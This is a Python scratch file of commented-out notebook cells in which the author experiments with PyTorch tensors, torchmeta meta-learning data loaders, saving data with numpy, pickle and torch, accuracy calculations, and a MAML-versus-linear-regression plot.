# print(f'\ni = {i}')
# print('done\n')
# time.sleep(1)
# pass
#
# # %%
#
# # zip, it aligns elements in one list to elements in the other
#
# l1 = [0, 1, 2]
# l2 = ['a', 'b', 'c']
#
# print(list(zip(l1, l2)))
#
# # %%
#
# from tqdm import tqdm
# import time
#
# lst = range(10000000)
# total = 2
#
# with tqdm(lst, total=total) as tlst:
# i = 0
# for _, element in enumerate(tlst):
# print(f'\n->i = {i}\n')
# time.sleep(0.2)
# i += 1
# if i >= total:
# break
#
# print('\n--> DONE \a')
#
# # %%
#
# from tqdm import tqdm
# import time
#
# lst = range(10000000)
# total = 2
#
# with tqdm(lst, total=total) as tlst:
# for idx, element in enumerate(tlst):
# print(f'\n->idx = {idx}\n')
# time.sleep(0.2)
# if idx >= total:
# break
#
# print('\n--> DONE \a')
#
# # %%
#
# from tqdm import tqdm
# import time
#
# lst = range(10000000)
# total = 2
#
# with tqdm(range(total)) as tcounter:
# lst = iter(lst)
# for idx, element in enumerate(tcounter):
# print(f'\n->idx = {idx}\n')
# time.sleep(0.2)
#
# print('\n--> DONE \a')
#
# # %%
#
# # Question: Do detached() tensors track their own gradients seperately?
# # Ans: Yes!
# # https://discuss.pytorch.org/t/why-is-the-clone-operation-part-of-the-computation-graph-is-it-even-differentiable/67054/11
#
# import torch
#
# a = torch.tensor([2.0], requires_grad=True)
# b = a.detach()
# b.requires_grad = True
#
# la = (5.0 - a) ** 2
# la.backward()
# print(f'a.grad = {a.grad}')
#
# lb = (6.0 - b) ** 2
# lb.backward()
# print(f'b.grad = {b.grad}')
#
# # %%
#
# import torch
# import torch.nn as nn
#
# from collections import OrderedDict
#
# params = OrderedDict([
# ('fc0', nn.Linear(in_features=4, out_features=4)),
# ('ReLU0', nn.ReLU()),
# ('fc1', nn.Linear(in_features=4, out_features=1))
# ])
# mdl = nn.Sequential(params)
#
# print(params)
# print(mdl._parameters)
# print(params == params)
# print(mdl._parameters == params)
# print(mdl._modules)
#
# print()
# for name, w in mdl.named_parameters():
# print(name, w.norm(2))
#
# print()
# # mdl._modules['fc0'] = nn.Linear(10,11)
# mdl._modules[0]
#
# for name, w in mdl.named_parameters():
# print(name, w.norm(2))
#
# # %%
#
# ## Q: are parameters are in computation graph?
# import torch
# import torch.nn as nn
# from torchviz import make_dot
#
# from collections import OrderedDict
#
# fc0 = nn.Linear(in_features=3, out_features=1)
# params = [('fc0', fc0)]
# mdl = nn.Sequential(OrderedDict(params))
#
# x = torch.randn(1, 3)
# y = torch.randn(1)
#
# l = (mdl(x) - y) ** 2
#
# # make_dot(l,{x:'x',y:'y','fc0':fc0})
# print(fc0.weight)
# print(fc0.bias)
# print(fc0.weight.to_tens)
# print()
# # make_dot(l,{x:'x',y:'y','fc0':fc0})
# make_dot(l, {'x': x, 'y': y})
# make_dot(l)
#
# # %%
#
# '''
# expand
# '''
#
# import torch
#
# x = torch.randn([2, 3, 4, 5])
#
# # h_0 of shape (num_layers * num_directions, batch, hidden_size)
# h = torch.randn([1, 4, 8])
#
# x_mean = x.mean()
# print(x_mean.size())
# print(x_mean)
# x = x_mean.expand_as(h)
# print(x.size())
# print(x)
#
# # %%
#
# import torch
#
# use_cuda = torch.cuda.is_available()
# device = torch.device("cuda" if use_cuda else "cpu")
# print(device)
# type(device)
# print(device == 'cpu')
# device.type
#
# # %%
#
# # THIS WORKS
#
# from torch.utils.tensorboard import SummaryWriter
#
# from pathlib import Path
#
# # log_dir (string) – Save directory location.
# # Default is runs/CURRENT_DATETIME_HOSTNAME, which changes after each run.
#
# tb = SummaryWriter()
# tb.add_scalar('loss', 111)
#
# # %%
#
# from torch.utils.tensorboard import SummaryWriter
#
# from pathlib import Path
#
#
# def CURRENT_DATETIME_HOSTNAME(comment=''):
# # if not log_dir:
# import socket
# import os
# from datetime import datetime
# current_time = datetime.now().strftime('%b%d_%H-%M-%S')
# log_dir = os.path.join('runs', current_time + '_' + socket.gethostname() + comment)
# return Path(log_dir)
#
#
# # log_dir (string) – Save directory location.
# # Default is runs/CURRENT_DATETIME_HOSTNAME, which changes after each run.
# # tensorboard --logdir=runs
# log_dir = (Path('~/automl-meta-learning/') / CURRENT_DATETIME_HOSTNAME()).expanduser()
# print(log_dir)
# tb = SummaryWriter(log_dir=log_dir)
# tb.add_scalar('loss', 15)
#
# # %%
#
# # download mini-imagenet automatically
#
# # from torchvision.utils import download_and_extract_archive
#
# import torchvision.utils as utils
#
# print(utils)
# # print(download_and_extract_archive)
#
# # %%
#
# # torch concat, https://pytorch.org/docs/stable/torch.html#torch.cat
# # Concatenates the given sequence of seq tensors in the given dimension.
# # All tensors must either have the same shape (except in the concatenating dimension) or be empty.
# import torch
#
# g1 = torch.randn(3, 2)
# g2 = torch.randn(4, 2)
#
# g3 = torch.randn(4, 2, 3)
#
# grads = [g1, g2]
# print(g1.view(-1).size())
# print(g2.view(-1).size())
# print(g3.view(-1).size())
# # print(g3.view(-1))
#
# grads = torch.cat(grads, dim=0)
# print(grads)
# print(grads.size())
# print(grads.mean())
# print(grads.std())
#
# # torch stack, https://pytorch.org/docs/stable/torch.html#torch.stack
# # Concatenates sequence of tensors along a new dimension.
# # All tensors need to be of the same size.
# # torch.stack([g1,g2], dim=0)
#
# # %%
#
# import torch
#
# a = torch.tensor([1, 2, 3.], requires_grad=True)
# a_detached = a.detach()
# print(a_detached.is_leaf)
# a_detached_sum = a.sum()
# print(c.is_leaf)
# d = c.detach()
# print(d.is_leaf)
#
# # %%
#
# import torch
#
# from types import SimpleNamespace
# from pathlib import Path
# from pprint import pprint
#
# x = torch.empty([1, 2, 3])
# print(x.size())
#
# args = SimpleNamespace()
# args.data_root = "~/automl-meta-learning/data/miniImagenet"
#
# # n1313361300001299.jpg
# args.data_root = Path(args.data_root).expanduser()
#
# # %%
#
# import torch
#
# CHW = 3, 12, 12
# x = torch.randn(CHW)
# y = torch.randn(CHW)
#
# new = [x, y]
# new = torch.stack(new)
# print(x.size())
# print(new.size())
#
# # %%
#
# print('a');
# print('b')
#
# # %%
#
# # conver list to tensor
#
# import torch
#
# x = torch.tensor([1, 2, 3.])
# print(x)
#
# # %%
#
# from torchvision.transforms import Compose, Resize, ToTensor
#
# import torchmeta
# from torchmeta.datasets.helpers import miniimagenet
#
# from pathlib import Path
# from types import SimpleNamespace
#
# from tqdm import tqdm
#
# ## get args
# args = SimpleNamespace(episodes=5, n_classes=5, k_shot=5, k_eval=15, meta_batch_size=1, n_workers=4)
# args.data_root = Path("~/automl-meta-learning/data/miniImagenet").expanduser()
#
# ## get meta-batch loader
# train_transform = Compose([Resize(84), ToTensor()])
# dataset = miniimagenet(
# args.data_root,
# ways=args.n_classes,
# shots=args.k_shot,
# test_shots=args.k_eval,
# meta_split='train',
# download=False)
# dataloader = torchmeta.utils.data.BatchMetaDataLoader(
# dataset,
# batch_size=args.meta_batch_size,
# num_workers=args.n_workers)
#
# with tqdm(dataset):
# print(f'len(dataloader)= {len(dataloader)}')
# for episode, batch in enumerate(dataloader):
# print(f'episode = {episode}')
# train_inputs, train_labels = batch["train"]
# print(f'train_labels[0] = {train_labels[0]}')
# print(f'train_inputs.size() = {train_inputs.size()}')
# pass
# if episode >= args.episodes:
# break
#
# # %%
#
# # zip tensors
#
# import torch
#
# x = torch.tensor([1., 2., 3.])
# y = torch.tensor([1, 2, 3])
#
# print(list(zip(x, y)))
#
# xx = torch.randn(2, 3, 84, 84)
# yy = torch.randn(2, 3, 32, 32)
#
# print(len(list(zip(xx, yy))))
#
# # %%
#
# x = 2
# print(x)
#
# # %%
#
# ## sinusioid function
# print('Starting Sinusioid cell')
#
# from torchmeta.toy import Sinusoid
# from torchmeta.utils.data import BatchMetaDataLoader
# from torchmeta.transforms import ClassSplitter
#
# # from tqdm import tqdm
#
# batch_size = 16
# shots = 5
# test_shots = 15
# # dataset = torchmeta.toy.helpers.sinusoid(shots=shots, test_shots=tes_shots)
# metaset_dataset = Sinusoid(num_samples_per_task=shots + test_shots, num_tasks=100, noise_std=None)
# splitter_metset_dataset = ClassSplitter(
# metaset_dataset,
# num_train_per_class=shots,
# num_test_per_class=test_shots,
# shuffle=True)
# dataloader = BatchMetaDataLoader(splitter_metset_dataset, batch_size=batch_size, num_workers=4)
#
# print(f'batch_size = {batch_size}')
# print(f'len(dataset) = {len(metaset_dataset)}')
# print(f'len(dataloader) = {len(dataloader)}\n')
# for batch_idx, batch in enumerate(dataloader):
# print(f'batch_idx = {batch_idx}')
# train_inputs, train_targets = batch['train']
# test_inputs, test_targets = batch['test']
# print(f'train_inputs.shape = {train_inputs.shape}')
# print(f'train_targets.shape = {train_targets.shape}')
# print(f'test_inputs.shape = {test_inputs.shape}')
# print(f'test_targets.shape = {test_targets.shape}')
# if batch_idx >= 1: # halt after 2 iterations
# break
#
# print('DONE\a')
#
# # %%
#
# ## notes of torchmeta
#
# from pathlib import Path
# import torchmeta
#
# # meta-set: creates collection of data-sets, D_meta = {D_1, ... Dn}
# print('\n-- Sinusoid(MetaDataset)')
# metaset_sinusoid = torchmeta.toy.Sinusoid(num_samples_per_task=10, num_tasks=1_000_000, noise_std=None)
# print(f'type(metaset_sinusoid) = {type(metaset_sinusoid)}')
# print(f'len(metaset_sinusoid) = {len(metaset_sinusoid)}')
# print(f'metaset_sinusoid = {metaset_sinusoid}')
#
# # this is still a data set but helps implement forming D_i
# # i.e. the N-way, K-shot tasks/datasets we need.
# print('\n-- MiniImagenet(CombinationMetaDataset)')
# data_path = Path('~/data').expanduser()
# metaset_miniimagenet = torchmeta.datasets.MiniImagenet(data_path, num_classes_per_task=5, meta_train=True,
# download=True)
# print(f'type(metaset_miniimagenet) = {type(metaset_miniimagenet)}')
# print(f'len(metaset_miniimagenet) = {len(metaset_miniimagenet)}')
# print(f'metaset_miniimagenet = {metaset_miniimagenet}')
#
# # Splits the data-sets inside the meta-set into support/train & query/test sets
# dataset = metaset_miniimagenet
# dataset = torchmeta.transforms.ClassSplitter(dataset, num_train_per_class=1, num_test_per_class=15, shuffle=True)
# print(dataset)
#
# # %%
#
# import torch
# import torch.nn as nn
# import numpy as np
#
# x = np.random.uniform()
#
# x = torch.rand()
#
# print(x)
#
# l = nn.Linear(1, 1)
#
# y = l(x)
#
# print(y)
#
# # %%
#
# # saving tensors for my data set
# import torch
# import torch.nn as nn
#
# from collections import OrderedDict
#
# from pathlib import Path
#
# # N x's of size D=1 in an interval
# Din, Dout = 3, 2
# num_samples = 5
# lb, ub = -1, 1
# X = (ub - lb) * torch.rand([num_samples, Din]) + lb # rand gives uniform in [0,1) range
#
# # N y's of size D=1 (from output of NN)
# f = nn.Sequential(OrderedDict([
# ('f1', nn.Linear(Din, Dout)),
# ('out', nn.SELU())
# ]))
#
# # fill cnn with Gaussian
# mu1, std1 = 5, 7.5
# f.f1.weight.data.normal_(mu1, std1)
# f.f1.bias.data.normal_(mu1, std1)
#
# # get outputs
# Y = f(X)
# print(Y)
#
# # save tensors and cnn
# # https://stackoverflow.com/questions/1466000/difference-between-modes-a-a-w-w-and-r-in-built-in-open-function
# db = {
# 'X': X,
# 'Y': Y
# }
# path = Path(f'~/data/tmp/SinData_mu1{mu1}_std1{std1}/').expanduser()
# path.mkdir(parents=True, exist_ok=True)
# with open(path / 'db', 'w') as file: # create file and truncate to length 0, only writing allowed
# torch.save(db, file)
#
# # %%
#
# # saving data in numpy
#
# import numpy as np
# import pickle
# from pathlib import Path
#
# path = Path('~/data/tmp/').expanduser()
# path.mkdir(parents=True, exist_ok=True)
#
# lb, ub = -1, 1
# num_samples = 5
# x = np.random.uniform(low=lb, high=ub, size=(1, num_samples))
# y = x ** 2 + x + 2
#
# # using save (to npy), savez (to npz)
# np.save(path / 'x', x)
# np.save(path / 'y', y)
# np.savez(path / 'db', x=x, y=y)
# with open(path / 'db.pkl', 'wb') as db_file:
# pickle.dump(obj={'x': x, 'y': y}, file=db_file)
#
# ## using loading npy, npz files
# x_loaded = np.load(path / 'x.npy')
# y_load = np.load(path / 'y.npy')
# db = np.load(path / 'db.npz')
# with open(path / 'db.pkl', 'rb') as db_file:
# db_pkl = pickle.load(db_file)
#
# print(x is x_loaded)
# print(x == x_loaded)
# print(x == db['x'])
# print(x == db_pkl['x'])
# print('done')
#
# # %%
#
# import numpy as np
# from pathlib import Path
#
# path = Path('~/data/tmp/').expanduser()
# path.mkdir(parents=True, exist_ok=True)
#
# lb, ub = -1, 1
# num_samples = 5
# x = np.random.uniform(low=lb, high=ub, size=(1, num_samples))
# y = x ** 2 + x + 2
#
# np.save(path / 'x', x)
# np.save(path / 'y', y)
#
# x_loaded = np.load(path / 'x.npy')
# y_load = np.load(path / 'y.npy')
#
# print(x is x_loaded) # False
# print(x == x_loaded) # [[ True True True True True]]
#
# # %%
#
# # saving torch tensors
#
# import torch
# import torch.nn as nn
# import torchvision
#
# from pathlib import Path
# from collections import OrderedDict
#
# path = Path('~/data/tmp/').expanduser()
# path.mkdir(parents=True, exist_ok=True)
#
# tensor_a = torch.rand(2, 3)
# tensor_b = torch.rand(1, 3)
#
# db = {'a': tensor_a, 'b': tensor_b}
#
# torch.save(db, path / 'torch_db')
# loaded = torch.load(path / 'torch_db')
# print(loaded['a'] == tensor_a)
# print(loaded['b'] == tensor_b)
#
# # testing if ToTensor() screws things up
# lb, ub = -1, 1
# N, Din, Dout = 3, 1, 1
# x = torch.distributions.Uniform(low=lb, high=ub).sample((N, Din))
# print(x)
#
# f = nn.Sequential(OrderedDict([
# ('f1', nn.Linear(Din, Dout)),
# ('out', nn.SELU())
# ]))
# y = f(x)
#
# transform = torchvision.transforms.transforms.ToTensor()
# y_proc = transform(y)
# print(y_proc)
#
# # %%
#
# # union dictionaries, https://stackoverflow.com/questions/38987/how-do-i-merge-two-dictionaries-in-a-single-expression-in-python
#
# d1 = {'a': 1, 'b': 2.5}
# d2 = {'b': 2, 'c': 3, 'd': 4}
# d = {**d1, **d2}
# # duplicates resolved in favour of d2
# print(d)
#
# # %%
#
# # generating uniform variables
#
# import numpy as np
#
# num_samples = 3
# Din = 1
# lb, ub = -1, 1
#
# xn = np.random.uniform(low=lb, high=ub, size=(num_samples, Din))
# print(xn)
#
# import torch
#
# sampler = torch.distributions.Uniform(low=lb, high=ub)
# r = sampler.sample((num_samples, Din))
#
# print(r)
#
# r2 = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
#
# print(r2)
#
# # process input
# f = nn.Sequential(OrderedDict([
# ('f1', nn.Linear(Din, Dout)),
# ('out', nn.SELU())
# ]))
# Y = f(r2)
# print(Y)
#
# # %%
#
# # sampling from normal distribution in torch
#
# import torch
#
# num_samples = 3
# Din = 1
# mu, std = 0, 1
# x = torch.distributions.normal.Normal(loc=mu, scale=std).sample((num_samples, Din))
#
# print(x)
#
# # %%
#
# # creating data and running through a nn and saving it
#
# import torch
# import torch.nn as nn
#
# from pathlib import Path
# from collections import OrderedDict
#
# import numpy as np
#
# import pickle
#
# path = Path('~/data/tmp/').expanduser()
# path.mkdir(parents=True, exist_ok=True)
#
# num_samples = 3
# Din, Dout = 1, 1
# lb, ub = -1, 1
#
# x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
#
# f = nn.Sequential(OrderedDict([
# ('f1', nn.Linear(Din, Dout)),
# ('out', nn.SELU())
# ]))
# y = f(x)
#
# # save data torch to numpy
# x_np, y_np = x.detach().cpu().numpy(), y.detach().cpu().numpy()
# np.savez(path / 'db', x=x_np, y=y_np)
#
# print(x_np)
# # save model
# with open('db_saving_seq', 'wb') as file:
# pickle.dump({'f': f}, file)
#
# # load model
# with open('db_saving_seq', 'rb') as file:
# db = pickle.load(file)
# f2 = db['f']
#
# # test that it outputs the right thing
# y2 = f2(x)
#
# y_eq_y2 = y == y2
# print(y_eq_y2)
#
# db2 = {'f': f, 'x': x, 'y': y}
# torch.save(db2, path / 'db_f_x_y')
#
# print('Done')
#
# db3 = torch.load(path / 'db_f_x_y')
# f3 = db3['f']
# x3 = db3['x']
# y3 = db3['y']
# yy3 = f3(x3)
#
# y_eq_y3 = y == y3
# print(y_eq_y3)
#
# y_eq_yy3 = y == yy3
# print(y_eq_yy3)
#
# # %%
#
# # test for saving everything with torch.save
#
# import torch
# import torch.nn as nn
#
# from pathlib import Path
# from collections import OrderedDict
#
# import numpy as np
#
# import pickle
#
# path = Path('~/data/tmp/').expanduser()
# path.mkdir(parents=True, exist_ok=True)
#
# num_samples = 3
# Din, Dout = 1, 1
# lb, ub = -1, 1
#
# x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
#
# f = nn.Sequential(OrderedDict([
# ('f1', nn.Linear(Din, Dout)),
# ('out', nn.SELU())
# ]))
# y = f(x)
#
# # save data torch to numpy
# x_np, y_np = x.detach().cpu().numpy(), y.detach().cpu().numpy()
# db2 = {'f': f, 'x': x_np, 'y': y_np}
# torch.save(db2, path / 'db_f_x_y')
# # np.savetxt(path / 'output.csv', y_np) # for csv
#
# db3 = torch.load(path / 'db_f_x_y')
# f3 = db3['f']
# x3 = db3['x']
# y3 = db3['y']
# xx = torch.tensor(x3)
# yy3 = f3(xx)
#
# print(yy3)
#
# # %%
#
# # my saving code for synthetic data, nvm using torch.save for everything
#
# # import torch
# # import torch.nn as nn
# #
# # from pathlib import Path
# # from collections import OrderedDict
# #
# # import numpy as np
# #
# # path = Path('~/data/tmp/').expanduser()
# # path.mkdir(parents=True, exist_ok=True)
# #
# # num_samples = 3
# # Din, Dout = 1, 1
# # lb, ub = -1, 1
# #
# # x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
# #
# # f = nn.Sequential(OrderedDict([
# # ('f1', nn.Linear(Din,Dout)),
# # ('out', nn.SELU())
# # ]))
# # y = f(x)
# #
# # # save data torch to numpy
# # x_np, y_np = x.detach().cpu().numpy(), y.detach().cpu().numpy()
# # np.savez(path / 'data', x=x_np, y=y_np)
# #
# # # save model
# # torch.save(f,path / 'f')
#
# # %%
#
# import torch
#
# import torch.nn as nn
#
# from collections import OrderedDict
#
# num_samples = 3
# Din, Dout = 1, 1
# lb, ub = -1, 1
#
# x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
#
# hidden_dim = [(Din, 20), (20, 20), (20, 20), (20, 20), (20, Dout)]
# f = nn.Sequential(OrderedDict([
# ('fc1;l1', nn.Linear(hidden_dim[0][0], hidden_dim[0][1])),
# ('relu2', nn.ReLU()),
# ('fc2;l1', nn.Linear(hidden_dim[1][0], hidden_dim[1][1])),
# ('relu2', nn.ReLU()),
# ('fc3;l1', nn.Linear(hidden_dim[2][0], hidden_dim[2][1])),
# ('relu3', nn.ReLU()),
# ('fc4;l1', nn.Linear(hidden_dim[3][0], hidden_dim[3][1])),
# ('relu4', nn.ReLU()),
# ('fc5;final;l2', nn.Linear(hidden_dim[4][0], hidden_dim[4][1]))
# ]))
#
# y = f(x)
#
# print(y)
#
# section_label = [1] * 4 + [2]
# print(section_label)
#
# # %%
#
# # get list of paths to task
# # https://stackoverflow.com/questions/973473/getting-a-list-of-all-subdirectories-in-the-current-directory
# # https://stackoverflow.com/a/44228436/1601580
#
# from pathlib import Path
# from glob import glob
#
# meta_split = 'train'
# data_path = Path('~/data/LS/debug/fully_connected_NN_mu1_1.0_std1_2.5_mu2_1.0_std2_0.5/')
# data_path = (data_path / meta_split).expanduser()
#
# # with path lib
# tasks_folder = [f for f in data_path.iterdir() if f.is_dir()]
#
# assert ('f_avg' not in tasks_folder)
#
# len_folder = len(tasks_folder)
# print(len_folder)
# print(tasks_folder)
# print()
#
# # with glob
# p = str(data_path) + '/*/'
# print(p)
# tasks_folder = glob(p)
#
# assert ('f_avg' not in tasks_folder)
#
# len_folder = len(tasks_folder)
# print(len_folder)
# print(tasks_folder)
# print()
#
# # with glob and negation
# print(set(glob(str(data_path / "f_avg"))))
# tasks_folder = set(glob(str(data_path / '*'))) - set(glob(str(data_path / "f_avg")))
#
# assert ('f_avg' not in tasks_folder)
#
# len_folder = len(tasks_folder)
# print(len_folder)
# print(tasks_folder)
# print()
#
# # %%
#
# # looping through metasets
#
# from torchmeta.utils.data import BatchMetaDataLoader
# from torchmeta.transforms import ClassSplitter
# from torchmeta.toy import Sinusoid
#
# from tqdm import tqdm
#
# # get data set
# dataset = Sinusoid(num_samples_per_task=25, num_tasks=30)
# shots, test_shots = 5, 15
# # get metaset
# metaset = ClassSplitter(
# dataset,
# num_train_per_class=shots,
# num_test_per_class=test_shots,
# shuffle=True)
# # get meta-dataloader
# batch_size = 16
# num_workers = 0
# meta_dataloader = BatchMetaDataLoader(metaset, batch_size=batch_size, num_workers=num_workers)
# epochs = 2
#
# print(f'batch_size = {batch_size}')
# print(f'len(metaset) = {len(metaset)}')
# print(f'len(meta_dataloader) = {len(meta_dataloader)}')
# with tqdm(range(epochs)) as tepochs:
# for epoch in tepochs:
# for batch_idx, batch in enumerate(meta_dataloader):
# print(f'\nbatch_idx = {batch_idx}')
# train_inputs, train_targets = batch['train']
# test_inputs, test_targets = batch['test']
# print(f'train_inputs.shape = {train_inputs.shape}')
# print(f'train_targets.shape = {train_targets.shape}')
# print(f'test_inputs.shape = {test_inputs.shape}')
# print(f'test_targets.shape = {test_targets.shape}')
#
# # %%
#
# from tqdm import tqdm
#
# import time
#
# with tqdm(range(5)) as trange:
# for t in trange:
# print(t)
# time.sleep(1)
#
# # %%
#
#
# import torch
# import torch.nn as nn
#
# l1 = torch.tensor([1, 2, 3.]) ** 0.5
# l2 = torch.tensor([0, 0, 0.0])
# mse = nn.MSELoss()
# loss = mse(l1, l2)
# print(loss)
#
# # %%
#
# import numpy as np
#
# x = np.arange(0, 10)
# print(x)
#
# print(x.max())
# print(x.min())
# print(x.mean())
# print(np.median(x))
#
# # %%
#
# x = torch.randn(3)
# print(x)
# print(x.argmax(-1))
#
# # %%
#
# # testing accuracy function
# # https://discuss.pytorch.org/t/calculating-accuracy-of-the-current-minibatch/4308/11
# # https://stackoverflow.com/questions/51503851/calculate-the-accuracy-every-epoch-in-pytorch
#
# import torch
# import torch.nn as nn
#
# D = 1
# true = torch.tensor([0, 1, 0, 1, 1]).reshape(5, 1)
# print(f'true.size() = {true.size()}')
#
# batch_size = true.size(0)
# print(f'batch_size = {batch_size}')
# x = torch.randn(batch_size, D)
# print(f'x = {x}')
# print(f'x.size() = {x.size()}')
#
# mdl = nn.Linear(D, 1)
# logit = mdl(x)
# _, pred = torch.max(logit.data, 1)
#
# print(f'logit = {logit}')
#
# print(f'pred = {pred}')
# print(f'true = {true}')
#
# acc = (true == pred).sum().item()
# print(f'acc = {acc}')
#
# # %%
#
# # https://towardsdatascience.com/understanding-dimensions-in-pytorch-6edf9972d3be
# # dimension
# # https://discuss.pytorch.org/t/how-does-one-get-the-predicted-classification-label-from-a-pytorch-model/91649/4?u=brando_miranda
# """
# Dimension reduction. It collapses/reduces a specific dimension by selecting an element from that dimension to be
# reduced.
# Consider x is 3D tensor. x.sum(1) converts x into a tensor that is 2D using an element from D1 elements in
# the 1th dimension. Thus:
# x.sum(1) = x[i,k] = op(x[i,:,k]) = op(x[i,0,k],...,x[i,D1,k])
# the key is to realize that we need 3 indices to select a single element. So if we use only 2 (because we are collapsing)
# then we have D1 number of elements possible left that those two indices might indicate. So from only 2 indices we get a
# set that we need to specify how to select. This is where the op we are using is used for and selects from this set.
# In theory if we want to collapse many indices we need to indicate how we are going to allow indexing from a smaller set
# of indices (using the remaining set that we'd usually need).
# """
#
# import torch
#
# x = torch.tensor([
# [1, 2, 3],
# [4, 5, 6]
# ])
#
# print(f'x.size() = {x.size()}')
#
# # sum the 0th dimension (rows). So we get a bunch of colums that have the rows added together.
# x0 = x.sum(0)
# print(x0)
#
# # sum the 1th dimension (columns)
# x1 = x.sum(1)
# print(x1)
#
# x_1 = x.sum(-1)
# print(x_1)
#
# x0 = x.max(0)
# print(x0.values)
#
# y = torch.tensor([[
# [1, 2, 3, 4],
# [5, 6, 7, 8],
# [9, 10, 11, 12]],
#
# [[13, 14, 15, 16],
# [17, 18, 19, 20],
# [21, 22, 23, 24]]])
#
# print(y)
#
# # into the screen [1, 13]
# print(y[:, 0, 0])
# # columns [1, 5, 9]
# print(y[0, :, 0])
# # rows [1, 2, 3, 4]
# print(y[0, 0, :])
#
# # for each remaining index, select the largest value in the "screen" dimension
# y0 = y.max(0)
# print(y0.values)
#
#
# # %%
#
# # understanding making label predictions
# # https://discuss.pytorch.org/t/how-does-one-get-the-predicted-classification-label-from-a-pytorch-model/91649/3?u=brando_miranda
#
# def calc_accuracy(mdl, X, Y):
# # reduce/collapse the classification dimension according to max op
# # resulting in most likely label
# max_vals, max_indices = mdl(X).max(1)
# # assumes the first dimension is batch size
# n = max_indices.size(0) # index 0 for extracting the # of elements
# # calulate acc (note .item() to do float division)
# acc = (max_indices == Y).sum().item() / n
# return acc
#
#
# import torch
# import torch.nn as nn
#
# # data dimension [batch-size, D]
# D, Dout = 1, 5
# batch_size = 16
# x = torch.randn(batch_size, D)
# y = torch.randint(low=0, high=Dout, size=(batch_size,))
#
# mdl = nn.Linear(D, Dout)
# logits = mdl(x)
# print(f'y.size() = {y.size()}')
# # removes the 1th dimension with a max, which is the classification layer
# # which means it returns the most likely label. Also, note you need to choose .indices since you want to return the
# # position of where the most likely label is (not it's raw logit value)
# pred = logits.max(1).indices
# print(pred)
#
# print('--- preds vs truth ---')
# print(f'predictions = {pred}')
# print(f'y = {y}')
#
# acc = (pred == y).sum().item() / pred.size(0)
# print(acc)
# print(calc_accuracy(mdl, x, y))
#
# # %%
#
# # https://discuss.pytorch.org/t/runtimeerror-element-0-of-variables-does-not-require-grad-and-does-not-have-a-grad-fn/11074/20
#
# import torch
# import torch.nn as nn
#
# x = torch.randn(1)
# mdl = nn.Linear(1, 1)
#
# y = mdl(x)
# print(mdl.weight)
#
# print(y)
#
# # %%
#
# # https://discuss.pytorch.org/t/how-to-get-the-module-names-of-nn-sequential/39682
# # looping through modules but get the one with a specific name
#
# import torch
# import torch.nn as nn
#
# from collections import OrderedDict
#
# params = OrderedDict([
# ('fc0', nn.Linear(in_features=4, out_features=4)),
# ('ReLU0', nn.ReLU()),
# ('fc1L:final', nn.Linear(in_features=4, out_features=1))
# ])
# mdl = nn.Sequential(params)
#
# # throws error
# # mdl['fc0']
#
# for m in mdl.children():
# print(m)
#
# print()
#
# for m in mdl.modules():
# print(m)
#
# print()
#
# for name, m in mdl.named_modules():
# print(name)
# print(m)
#
# print()
#
# for name, m in mdl.named_children():
# print(name)
# print(m)
#
# # %%
#
# # apply mdl to x until the final layer, then return the embeding
#
# import torch
# import torch.nn as nn
#
# from collections import OrderedDict
#
# Din, Dout = 1, 1
# H = 10
#
# modules = OrderedDict([
# ('fc0', nn.Linear(in_features=Din, out_features=H)),
# ('ReLU0', nn.ReLU()),
#
# ('fc1', nn.Linear(in_features=H, out_features=H)),
# ('ReLU1', nn.ReLU()),
#
# ('fc2', nn.Linear(in_features=H, out_features=H)),
# ('ReLU2', nn.ReLU()),
#
# ('fc3', nn.Linear(in_features=H, out_features=H)),
# ('ReLU3', nn.ReLU()),
#
# ('fc4L:final', nn.Linear(in_features=H, out_features=Dout))
# ])
#
# mdl = nn.Sequential(modules)
#
# out = x
# for name, m in self.base_model.named_children():
# if 'final' in name:
# # return out
# break
# out = m(out)
#
# print(out.size())
#
# # %%
#
# # initializing a constant weight net
# # https://discuss.pytorch.org/t/how-to-add-appropriate-noise-to-a-neural-network-with-constant-weights-so-that-back-propagation-training-works/93411
#
# # import torch
#
# # [layer.reset_parameters() for layer in base_model.children() if hasattr(layer, 'reset_parameters')]
#
# # model = nn.Linear(1, 1)
# # model_copy = copy.deepcopy(model)
#
# # %%
#
# print('start')
#
# # f_avg: PLinReg vs MAML
#
# import numpy as np
# from matplotlib import my_pyplot as plt
# from pathlib import Path
#
# datas_std = [0.1, 0.125, 0.1875, 0.2]
#
# pl = [2.3078539778125768e-07,
# 1.9997889411762922e-07,
# 2.729681222011256e-07,
# 3.2532371115080884e-07]
# pl_stds = [1.4852212316567463e-08,
# 5.090588920661132e-09,
# 1.1424832554909115e-08,
# 5.058656213138166e-08]
#
# maml = [3.309504692539563e-07,
# 4.1058904888091606e-06,
# 6.8326703386053605e-06,
# 7.4616147721799645e-06]
# maml_stds = [4.039131189060566e-08,
# 3.66839089258494e-08,
# 9.20683484136399e-08,
# 9.789292209743077e-08]
#
# # fig = plt.figure()
# fig, ax = plt.subplots(nrows=1, ncols=1)
#
# ax.set_title('MAML vs Pre-Trained embedding with Linear Regression')
#
# x = datas_std
#
# ax.errorbar(x, pl, yerr=pl_stds, label='PLinReg', marker='o')
# ax.errorbar(x, maml, yerr=maml_stds, label='MAML', marker='o')
# ax.plot()
# ax.legend()
#
# ax.set_xlabel('std (of FNN Data set)')
# ax.set_ylabel('meta-test loss (MSE)')
#
# plt.show()
#
# # path = Path('~/ultimate-utils/plot').expanduser()
# # fig.savefig(path)
#
# print('done \a')
# # %%
#
# # Torch-meta miniImagenet
# # loop through meta-batches of this data set, print the size, make sure it's the size you exepct
#
# import torchmeta
# from torchmeta.utils.data import BatchMetaDataLoader
# from torchmeta.transforms import ClassSplitter
# # from torchmeta.toy import Sinusoid
#
# from tqdm import tqdm
#
# # dataset = Sinusoid(num_samples_per_task=100, num_tasks=20)
# dataset = torchmeta.datasets.MiniImagenet(data_path, num_classes_per_task=5, meta_train=True, download=True)
# print(f'type(metaset_miniimagenet) = {type(dataset)}')
# print(f'len(metaset_miniimagenet) = {len(dataset)}')
# shots, test_shots = 5, 15
# # get metaset
# metaset = ClassSplitter(
# dataset,
# num_train_per_class=shots,
# num_test_per_class=test_shots,
# shuffle=True)
# # get meta-dataloader
# batch_size = 16
# num_workers = 0
